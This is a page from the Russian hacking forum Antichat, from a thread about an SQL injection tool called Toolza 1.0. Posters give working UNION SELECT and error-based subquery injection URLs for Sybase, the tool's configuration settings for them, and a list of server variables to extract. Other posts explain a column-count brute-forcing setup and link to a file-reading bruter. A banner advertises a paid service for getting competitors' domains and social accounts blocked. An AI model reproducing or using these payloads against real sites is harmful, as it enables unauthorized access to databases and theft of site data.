Форум АНТИЧАТ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Toolza 1.0

Страница 24 из 25

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#231

25.03.2010, 08:52

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

update:

Sybase:

1 . UNION SELECT method:

Код:

http://site.com/index.phtml?pid=7+union+select+null,@@version,null

Настройки в скрипте:

$s_union_select_url = "http://site.com/index.phtml?pid=7+union+select+null,^,null"; # url UNION+SELECT method
$s_subquery_url = ""; # url SUBQUERY method
$s_method = 0; # 0 - UNION+SELECT method, 1 - SUBQUERY method
$s_filtr = "--"; # close SQL
$s_plus = "+"; # %20,%2b & etc.
$s_convert = "numeric"; # default type to convert - numeric (for subquery method)

1 . SUBQUERY method:

Код:

http://site.com/index.phtml?pid=-7+or+1=convert(numeric,(select+@@version))--+

Настройки в скрипте:

$s_union_select_url = ""; # url UNION+SELECT method
$s_subquery_url = "http://site.com/index.phtml?pid=-7+or+1="; # url SUBQUERY method
$s_method = 1; # 0 - UNION+SELECT method, 1 - SUBQUERY method
$s_filtr = "--+"; # close SQL
$s_plus = "+"; # %20,%2b & etc.
$s_convert = "numeric"; # default type to convert - numeric (for subquery method)

+ системные данные:

Код:

@@version
user_name()
@@boottime
@@errorlog
@@language
@@servername
db_name()

#232

28.04.2010, 01:56

Akula007

Новичок

Регистрация: 23.04.2010

Сообщений: 11

Провел на форуме:
21165

Репутация: 0

Как сканировать определенный сайт?

#233

28.04.2010, 21:39

DavanG3

Новичок

Регистрация: 17.04.2010

Сообщений: 12

Провел на форуме:
61047

Репутация: 1

Что случилось с видео я не вижу и не скачать?

#234

28.04.2010, 22:54

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Видео случайно похерилось)) Теперь только на интуиции

#235

28.04.2010, 23:20

DavanG3

Новичок

Регистрация: 17.04.2010

Сообщений: 12

Провел на форуме:
61047

Репутация: 1

Хм, которые могут загружать видео еще раз?

#236

28.04.2010, 23:49

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

Выкладываем то что есть (потом Пашкела сам сортирует)
режим LFI/READER/Load_file() bruter - сжатый(3,12 Мб), распаковынный(120 Мб)

Скачать

#237

29.04.2010, 00:12

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Всё, нашел бекапы, уже перезаливаю, через час все будет на месте

last version - http://bug-track.ru/prog/toolza1.0.zip

All videos on the places

Последний раз редактировалось Pashkela; 29.04.2010 в 01:20..

#238

29.04.2010, 10:29

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

pashkela бро тулза прекрасно справляется со своей задачей респект. Если сможеш добав функцию чтоб инжектил и на Header. Чтоб можно было свою дополнитую хедер добавит с инжектом. Много скули на хедере но тулза не поддерживает ((

#239

03.05.2010, 19:42

AKYLA

Участник форума

Регистрация: 29.11.2007

Сообщений: 116

Провел на форуме:
283596

Репутация: 88

У меня вопрос по "MySQL injection column number bruter"
Как указать скрипту что нужно в определенном параметре вставлять брут?
например: www.pupkin.com/index.php?param1=тут уязвим параметр&param2=13

#240

03.05.2010, 20:00

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Цитата:

Сообщение от AKYLA

ну если к примеру хотим получить чонить такое:

www.pupkin.com/index.php?param1=1+union+select+1,2,3--+&param2=13

то так:

Код:

$source_sql_c = "www.pupkin.com/index.php?param1=1";# url
$filtr_c = "--+&param2=13"; # close SQL
$plus_c = "+"; # /**/,%20,%2b & etc.
$sql_mess = "Different number of columns";# Текст идентификатор правильного/неправильного запроса
$sql_mess_type = 0;# Тип текста идентификатора, 1 - когда запрос правильный, 0 - когда запрос неправильный

т.е. просто "рубим" ссылку пополам в том месте, куда предполагаем вставлять "+union+select+1,2,3....."

Страница 24 из 25

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Групарик 1.0 - скрипт для массовой рассылки приглашений на группы [В]Контакте	HERO	Покупка, продажа, услуги в Соц. Сетях	19	31.10.2009 10:26
Продажа от Goldriver'a	Goldriver	ICQ - Покупка, продажа	3	06.07.2009 20:15
Мобильные браузеры Skyfire 1.0 и Opera Mobile 9.7	jerrri	Мировые новости	0	10.06.2009 18:29
Самая главная программа для Интернета: некоторые факты о веб-браузерах.	FordMX	Soft - Windows	4	17.04.2009 22:33
FreeDOS v 1.0 released	spencer	Мировые новости	12	11.09.2006 20:43

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход